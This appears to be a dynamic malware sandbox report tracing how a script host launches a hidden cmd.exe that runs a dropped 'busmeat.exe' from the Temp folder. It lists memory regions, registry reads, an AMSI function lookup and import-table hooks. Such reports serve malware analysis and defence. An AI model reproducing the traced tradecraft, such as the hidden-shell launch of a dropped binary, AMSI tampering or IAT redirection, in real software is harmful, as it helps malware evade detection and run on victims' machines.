Process Create process_name = cmd, show_window = SW_HIDE True 1
Fn
System Sleep duration = -1 (infinite) True 1
Fn
Module Get Address module_name = c:\windows\system32\amsi.dll, function = AmsiUninitialize, address_out = 0x7ffbf69d2490 True 1
Fn
Thread 0xdbc
1 0
»
Category Operation Information Success Count Logfile
Window Create class_name = WSH-Timer, wndproc_parameter = 643066059760 True 1
Fn
Process #3: cmd.exe
47 0
»
Information Value
ID #3
File Name c:\windows\system32\cmd.exe
Command Line "C:\Windows\System32\cmd.exe" /c C:\Users\CIIHMN~1\AppData\Local\Temp\busmeat.exe
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:00, Reason: Child Process
Unmonitor End Time: 00:02:31, Reason: Terminated by Timeout
Monitor Duration 00:01:31
OS Process Information
»
Information Value
PID 0xed0
Parent PID 0xd98 (c:\windows\system32\cscript.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x ED4
0x EF4
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x0000009c23f60000 0x9c23f60000 0x9c23f7ffff Private Memory Readable, Writable True False False -
pagefile_0x0000009c23f60000 0x9c23f60000 0x9c23f6ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000009c23f70000 0x9c23f70000 0x9c23f76fff Private Memory Readable, Writable True False False -
pagefile_0x0000009c23f80000 0x9c23f80000 0x9c23f93fff Pagefile Backed Memory Readable True False False -
private_0x0000009c23fa0000 0x9c23fa0000 0x9c2409ffff Private Memory Readable, Writable True False False -
pagefile_0x0000009c240a0000 0x9c240a0000 0x9c240a3fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000009c240b0000 0x9c240b0000 0x9c240b0fff Pagefile Backed Memory Readable True False False -
private_0x0000009c240c0000 0x9c240c0000 0x9c240c1fff Private Memory Readable, Writable True False False -
locale.nls 0x9c240d0000 0x9c2418dfff Memory Mapped File Readable False False False -
private_0x0000009c24190000 0x9c24190000 0x9c24196fff Private Memory Readable, Writable True False False -
private_0x0000009c24280000 0x9c24280000 0x9c2437ffff Private Memory Readable, Writable True False False -
private_0x0000009c24380000 0x9c24380000 0x9c2447ffff Private Memory Readable, Writable True False False -
private_0x0000009c24660000 0x9c24660000 0x9c2466ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x9c24670000 0x9c249a6fff Memory Mapped File Readable False False False -
pagefile_0x00007df5ffa60000 0x7df5ffa60000 0x7ff5ffa5ffff Pagefile Backed Memory - True False False -
sysmain.sdb 0x7ff6489a0000 0x7ff648d2ffff Memory Mapped File Readable False False False -
pagefile_0x00007ff648d30000 0x7ff648d30000 0x7ff648e2ffff Pagefile Backed Memory Readable True False False -
pagefile_0x00007ff648e30000 0x7ff648e30000 0x7ff648e52fff Pagefile Backed Memory Readable True False False -
private_0x00007ff648e5b000 0x7ff648e5b000 0x7ff648e5cfff Private Memory Readable, Writable True False False -
private_0x00007ff648e5d000 0x7ff648e5d000 0x7ff648e5efff Private Memory Readable, Writable True False False -
private_0x00007ff648e5f000 0x7ff648e5f000 0x7ff648e5ffff Private Memory Readable, Writable True False False -
cmd.exe 0x7ff649c70000 0x7ff649cc8fff Memory Mapped File Readable, Writable, Executable True False False -
apphelp.dll 0x7ffbff0d0000 0x7ffbff147fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x7ffc01360000 0x7ffc0153cfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x7ffc02060000 0x7ffc020fcfff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x7ffc03dc0000 0x7ffc03e6cfff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x7ffc03e70000 0x7ffc04031fff Memory Mapped File Readable, Writable, Executable False False False -
Threads
Thread 0xed4
47 0
»
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\windows\system32\cmd.exe, base_address = 0x7ff649c70000 True 1
Fn
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x7ffc03dc0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x7ffc03ddd550 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System False 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 3
Fn
File Open filename = STD_INPUT_HANDLE True 2
Fn
Environment Get Environment String - True 2
Fn
Data
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Module Get Filename process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260 True 1
Fn
Environment Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Environment Get Environment String name = PROMPT False 1
Fn
Environment Set Environment String name = PROMPT, value = $P$G True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Environment Get Environment String name = KEYS False 1
Fn
File Get Info filename = C:\Windows\system32, type = file_attributes True 1
Fn
File Get Info filename = C:\Windows\System32, type = file_attributes True 1
Fn
Environment Set Environment String name = =C:, value = C:\Windows\System32 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x7ffc03dc0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x7ffc03de25e0 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x7ffc03de1f90 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x7ffc013b3a10 True 1
Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Process Create process_name = C:\Users\CIIHMN~1\AppData\Local\Temp\busmeat.exe, os_pid = 0xef8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Environment Set Environment String name = COPYCMD True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Process #5: busmeat.exe
9017 35
»
Information Value
ID #5
File Name c:\users\ciihmn~1\appdata\local\temp\busmeat.exe
Command Line C:\Users\CIIHMN~1\AppData\Local\Temp\busmeat.exe
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:01, Reason: Child Process
Unmonitor End Time: 00:02:31, Reason: Terminated by Timeout
Monitor Duration 00:01:30
OS Process Information
»
Information Value
PID 0xef8
Parent PID 0xed0 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x EFC
0x F00
0x F84
0x F88
0x F98
0x FF4
0x B50
0x C04
0x 7C4
0x 350
0x 93C
0x CA4
0x D10
0x CF0
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00023fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000040000 0x00040000 0x00053fff Pagefile Backed Memory Readable True False False -
private_0x0000000000060000 0x00060000 0x0009ffff Private Memory Readable, Writable True False False -
private_0x0000000000060000 0x00060000 0x00060fff Private Memory Readable, Writable True False False -
private_0x0000000000060000 0x00060000 0x0006ffff Private Memory Readable, Writable True False False -
private_0x0000000000060000 0x00060000 0x00073fff Private Memory Readable, Writable True False False -
private_0x0000000000070000 0x00070000 0x00070fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000070000 0x00070000 0x00077fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000080000 0x00080000 0x00080fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000080000 0x00080000 0x00087fff Pagefile Backed Memory Readable, Writable True False False -
crypt32.dll.mui 0x00080000 0x00089fff Memory Mapped File Readable False False False -
private_0x0000000000090000 0x00090000 0x00090fff Private Memory Readable, Writable, Executable True False False -
private_0x00000000000a0000 0x000a0000 0x0019ffff Private Memory Readable, Writable True False False -
private_0x00000000000a0000 0x000a0000 0x000a0fff Private Memory Readable, Writable True False False -
private_0x00000000000b0000 0x000b0000 0x000b0fff Private Memory Readable, Writable True False False -
private_0x00000000000c0000 0x000c0000 0x000c0fff Private Memory Readable, Writable True False False -
private_0x00000000000d0000 0x000d0000 0x000d0fff Private Memory Readable, Writable True False False -
private_0x00000000000e0000 0x000e0000 0x000e0fff Private Memory Readable, Writable True False False -
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory Readable, Writable True False False -
private_0x0000000000100000 0x00100000 0x00100fff Private Memory Readable, Writable True False False -
private_0x0000000000110000 0x00110000 0x00110fff Private Memory Readable, Writable True False False -
private_0x0000000000120000 0x00120000 0x00120fff Private Memory Readable, Writable True False False -
private_0x0000000000130000 0x00130000 0x00130fff Private Memory Readable, Writable True False False -
private_0x0000000000140000 0x00140000 0x0014ffff Private Memory Readable, Writable True False False -
private_0x0000000000140000 0x00140000 0x00153fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000140000 0x00140000 0x00147fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000140000 0x00140000 0x00140fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000150000 0x00150000 0x00150fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000160000 0x00160000 0x00167fff Pagefile Backed Memory Readable, Writable True False False -
counters.dat 0x00160000 0x00160fff Memory Mapped File Readable, Writable True True False
private_0x0000000000170000 0x00170000 0x00172fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000180000 0x00180000 0x00182fff Private Memory Readable, Writable, Executable True False False -
pagefile_0x0000000000190000 0x00190000 0x00190fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a3fff Pagefile Backed Memory Readable True False False -
private_0x00000000001b0000 0x001b0000 0x001b1fff Private Memory Readable, Writable True False False -
locale.nls 0x001c0000 0x0027dfff Memory Mapped File Readable False False False -
private_0x0000000000280000 0x00280000 0x00280fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000290000 0x00290000 0x00290fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000290000 0x00290000 0x00293fff Pagefile Backed Memory Readable True False False -
private_0x00000000002a0000 0x002a0000 0x002a3fff Private Memory Readable, Writable True False False -
private_0x00000000002b0000 0x002b0000 0x002bffff Private Memory Readable, Writable True False False -
private_0x00000000002c0000 0x002c0000 0x002fffff Private Memory Readable, Writable True False False -
private_0x0000000000300000 0x00300000 0x003fffff Private Memory Readable, Writable True False False -
busmeat.exe 0x00400000 0x00b48fff Memory Mapped File Readable, Writable, Executable True True False
pagefile_0x0000000000b50000 0x00b50000 0x00cd7fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000ce0000 0x00ce0000 0x00ce0fff Pagefile Backed Memory Readable True False False -
private_0x0000000000ce0000 0x00ce0000 0x00cf6fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000d00000 0x00d00000 0x00dfffff Private Memory Readable, Writable True False False -
private_0x0000000000e00000 0x00e00000 0x00e26fff Private Memory Readable, Writable True False False -
private_0x0000000000e00000 0x00e00000 0x00e3ffff Private Memory Readable, Writable True False False -
private_0x0000000000e40000 0x00e40000 0x00e7ffff Private Memory Readable, Writable True False False -
private_0x0000000000e40000 0x00e40000 0x00e40fff Private Memory Readable, Writable True False False -
private_0x0000000000e50000 0x00e50000 0x00e50fff Private Memory Readable, Writable, Executable True False False -
pagefile_0x0000000000e50000 0x00e50000 0x00e89fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000e50000 0x00e50000 0x00e8ffff Private Memory Readable, Writable True False False -
private_0x0000000000e90000 0x00e90000 0x00e90fff Private Memory Readable, Writable True False False -
private_0x0000000000e90000 0x00e90000 0x00e93fff Private Memory Readable, Writable True False False -
private_0x0000000000ea0000 0x00ea0000 0x00eaffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000eb0000 0x00eb0000 0x01030fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001040000 0x01040000 0x0243ffff Pagefile Backed Memory Readable True False False -
private_0x0000000002440000 0x02440000 0x02540fff Private Memory Readable, Writable True False False -
private_0x0000000002440000 0x02440000 0x02541fff Private Memory Readable, Writable True False False -
private_0x0000000002440000 0x02440000 0x0257ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002440000 0x02440000 0x024f7fff Pagefile Backed Memory Readable True False False -
private_0x0000000002440000 0x02440000 0x0253ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002540000 0x02540000 0x02541fff Pagefile Backed Memory Readable True False False -
mswsock.dll.mui 0x02550000 0x02552fff Memory Mapped File Readable False False False -
private_0x0000000002570000 0x02570000 0x0257ffff Private Memory Readable, Writable True False False -
private_0x0000000002580000 0x02580000 0x0276ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002580000 0x02580000 0x02637fff Pagefile Backed Memory Readable True False False -
private_0x0000000002640000 0x02640000 0x0273ffff Private Memory Readable, Writable True False False -
private_0x0000000002760000 0x02760000 0x0276ffff Private Memory Readable, Writable True False False -
private_0x0000000002770000 0x02770000 0x0286ffff Private Memory Readable, Writable True False False -
private_0x0000000002870000 0x02870000 0x028effff Private Memory Readable, Writable True False False -
sortdefault.nls 0x028f0000 0x02c26fff Memory Mapped File Readable False False False -
private_0x0000000002c30000 0x02c30000 0x02d2ffff Private Memory Readable, Writable True False False -
private_0x0000000002d30000 0x02d30000 0x02d6ffff Private Memory Readable, Writable True False False -
private_0x0000000002d70000 0x02d70000 0x02e6ffff Private Memory Readable, Writable True False False -
private_0x0000000002e70000 0x02e70000 0x02eaffff Private Memory Readable, Writable True False False -
private_0x0000000002eb0000 0x02eb0000 0x02faffff Private Memory Readable, Writable True False False -
wow64.dll 0x59300000 0x5934efff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x59350000 0x59357fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x59360000 0x593d2fff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x73f40000 0x74148fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x74150000 0x74195fff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x741a0000 0x741a7fff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x741b0000 0x7430ffff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x74310000 0x74393fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x743a0000 0x743edfff Memory Mapped File Readable, Writable, Executable False False False -
winhttp.dll 0x743f0000 0x74496fff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x744a0000 0x744a7fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x744b0000 0x744dffff Memory Mapped File Readable, Writable, Executable False False False -
ondemandconnroutehelper.dll 0x744e0000 0x744f0fff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x74500000 0x747c0fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x747d0000 0x747fefff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74800000 0x74812fff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x74820000 0x74a43fff Memory Mapped File Readable, Writable, Executable False False False -
msvcr100.dll 0x74a50000 0x74b0efff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x74b10000 0x74b2afff Memory Mapped File Readable, Writable, Executable False False False -
winspool.drv 0x74b30000 0x74b96fff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x74ba0000 0x74bbcfff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x74bc0000 0x74c34fff Memory Mapped File Readable, Writable, Executable False False False -
apphelp.dll 0x74c40000 0x74cd0fff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x74ce0000 0x74d38fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x74d40000 0x74d49fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x74d50000 0x74d6dfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x74d70000 0x74eaffff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x74eb0000 0x75024fff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x75030000 0x75065fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x75070000 0x7507efff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x75080000 0x750c3fff Memory Mapped File Readable, Writable, Executable False False False -
windows.storage.dll 0x750d0000 0x755acfff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x755b0000 0x7696efff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76970000 0x76ae5fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x76ca0000 0x76decfff Memory Mapped File Readable, Writable, Executable False False False -
kernel.appcore.dll 0x76f60000 0x76f6bfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x76f70000 0x7708ffff Memory Mapped File Readable, Writable, Executable False False False -
combase.dll 0x77090000 0x77249fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x77250000 0x77292fff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x773d0000 0x773d5fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x77430000 0x77519fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x775e0000 0x7760afff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x77670000 0x7775ffff Memory Mapped File Readable, Writable, Executable False False False -
powrprof.dll 0x777f0000 0x77833fff Memory Mapped File Readable, Writable, Executable False False False -
shcore.dll 0x778a0000 0x7792cfff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x77930000 0x7798bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77990000 0x77a0afff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x77a10000 0x77acdfff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x77ad0000 0x77ad6fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x77ae0000 0x77aedfff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x77af0000 0x77b9bfff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x77ba0000 0x77c31fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77c40000 0x77db8fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007feaa000 0x7feaa000 0x7feacfff Private Memory Readable, Writable True False False -
private_0x000000007fead000 0x7fead000 0x7feaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007feb0000 0x7feb0000 0x7ffaffff Pagefile Backed Memory Readable True False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007ffd5000 0x7ffd5000 0x7ffd7fff Private Memory Readable, Writable True False False -
private_0x000000007ffd8000 0x7ffd8000 0x7ffdafff Private Memory Readable, Writable True False False -
private_0x000000007ffdb000 0x7ffdb000 0x7ffddfff Private Memory Readable, Writable True False False -
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory Readable, Writable True False False -
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory Readable, Writable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7ffc03e6ffff Private Memory Readable True False False -
ntdll.dll 0x7ffc03e70000 0x7ffc04031fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ffc04032000 0x7ffc04032000 0x7ffffffeffff Private Memory Readable True False False -
For performance reasons, the remaining 307 entries are omitted.
The remaining entries can be found in flog.txt.
Hook Information
»
Type Installer Target Size Information Actions
IAT private_0x0000000000d00000:+0x19a8c 1. entry of busmeat.exe 4 bytes gdi32.dll:PolyDraw+0x0 now points to pagefile_0x0000000000010000:+0x2350
IAT private_0x0000000000d00000:+0x19370 1. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x2350 now points to kernel32.dll:GetCurrentProcess+0x0
IAT private_0x0000000000d00000:+0x19a8c 2. entry of busmeat.exe 4 bytes gdi32.dll:ResetDCA+0x0 now points to pagefile_0x0000000000010000:+0x2364
IAT private_0x0000000000d00000:+0x19370 2. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x2364 now points to kernel32.dll:WaitForSingleObject+0x0
IAT private_0x0000000000d00000:+0x19a8c 3. entry of busmeat.exe 4 bytes gdi32.dll:TranslateCharsetInfo+0x0 now points to pagefile_0x0000000000010000:+0x237a
IAT private_0x0000000000d00000:+0x19370 3. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x237a now points to kernel32.dll:OpenProcess+0x0
IAT private_0x0000000000d00000:+0x19a8c 4. entry of busmeat.exe 4 bytes gdi32.dll:GetGlyphOutlineA+0x0 now points to pagefile_0x0000000000010000:+0x2388
IAT private_0x0000000000d00000:+0x19370 4. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x2388 now points to kernel32.dll:Sleep+0x0
IAT private_0x0000000000d00000:+0x19a8c 5. entry of busmeat.exe 4 bytes gdi32.dll:CreateICW+0x0 now points to pagefile_0x0000000000010000:+0x2390
IAT private_0x0000000000d00000:+0x19370 5. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x2390 now points to kernel32.dll:GetModuleFileNameW+0x0
IAT private_0x0000000000d00000:+0x19a8c 6. entry of busmeat.exe 4 bytes gdi32.dll:AddFontResourceA+0x0 now points to pagefile_0x0000000000010000:+0x23a6
IAT private_0x0000000000d00000:+0x19370 6. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x23a6 now points to kernel32.dll:CreateFileW+0x0
IAT private_0x0000000000d00000:+0x19a8c 7. entry of busmeat.exe 4 bytes gdi32.dll:SetICMProfileA+0x0 now points to pagefile_0x0000000000010000:+0x23b4
IAT private_0x0000000000d00000:+0x19370 7. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x23b4 now points to ntdll.dll:RtlExitUserThread+0x0
IAT private_0x0000000000d00000:+0x19370 8. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x23c2 now points to kernel32.dll:GetLastError+0x0
IAT private_0x0000000000d00000:+0x19a8c 9. entry of busmeat.exe 4 bytes kernel32.dll:CreateMailslotA+0x0 now points to pagefile_0x0000000000010000:+0x23d2
IAT private_0x0000000000d00000:+0x19370 9. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x23d2 now points to kernel32.dll:GetProcAddress+0x0
IAT private_0x0000000000d00000:+0x19a8c 10. entry of busmeat.exe 4 bytes kernel32.dll:MapViewOfFile+0x0 now points to pagefile_0x0000000000010000:+0x2342
IAT private_0x0000000000d00000:+0x19370 10. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x2342 now points to kernel32.dll:ExitProcess+0x0
IAT private_0x0000000000d00000:+0x19a8c 11. entry of busmeat.exe 4 bytes kernel32.dll:lstrlenA+0x0 now points to pagefile_0x0000000000010000:+0x23f6
IAT private_0x0000000000d00000:+0x19370 11. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x23f6 now points to kernel32.dll:GetModuleHandleA+0x0
IAT private_0x0000000000d00000:+0x19a8c 12. entry of busmeat.exe 4 bytes kernel32.dll:TlsGetValue+0x0 now points to pagefile_0x0000000000010000:+0x240a
IAT private_0x0000000000d00000:+0x19370 12. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x240a now points to kernel32.dll:CloseHandle+0x0
IAT private_0x0000000000d00000:+0x19a8c 13. entry of busmeat.exe 4 bytes kernel32.dll:GetModuleFileNameW+0x0 now points to pagefile_0x0000000000010000:+0x2418
IAT private_0x0000000000d00000:+0x19370 13. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x2418 now points to kernel32.dll:GetCurrentProcessId+0x0
IAT private_0x0000000000d00000:+0x19a8c 14. entry of busmeat.exe 4 bytes kernel32.dll:WriteProfileSectionA+0x0 now points to pagefile_0x0000000000010000:+0x288c
IAT private_0x0000000000d00000:+0x19370 14. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x288c now points to kernel32.dll:GetVersionExW+0x0
IAT private_0x0000000000d00000:+0x19a8c 15. entry of busmeat.exe 4 bytes kernel32.dll:GetTempPathA+0x0 now points to pagefile_0x0000000000010000:+0x287c
IAT private_0x0000000000d00000:+0x19370 15. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x287c now points to kernel32.dll:LoadLibraryA+0x0
IAT private_0x0000000000d00000:+0x19a8c 16. entry of busmeat.exe 4 bytes kernel32.dll:SetDefaultCommConfigA+0x0 now points to pagefile_0x0000000000010000:+0x2870
IAT private_0x0000000000d00000:+0x19370 16. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x2870 now points to kernel32.dll:lstrlenW+0x0
IAT private_0x0000000000d00000:+0x19a8c 17. entry of busmeat.exe 4 bytes kernel32.dll:FindVolumeMountPointClose+0x0 now points to pagefile_0x0000000000010000:+0x285e
IAT private_0x0000000000d00000:+0x19370 17. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x285e now points to kernel32.dll:TerminateThread+0x0
IAT private_0x0000000000d00000:+0x19a8c 18. entry of busmeat.exe 4 bytes kernel32.dll:DosDateTimeToFileTime+0x0 now points to pagefile_0x0000000000010000:+0x284e
IAT private_0x0000000000d00000:+0x19370 18. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x284e now points to kernel32.dll:CreateThread+0x0
IAT private_0x0000000000d00000:+0x19a8c 19. entry of busmeat.exe 4 bytes kernel32.dll:SetConsoleMode+0x0 now points to pagefile_0x0000000000010000:+0x283e
IAT private_0x0000000000d00000:+0x19370 19. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x283e now points to kernel32.dll:WriteConsoleW+0x0
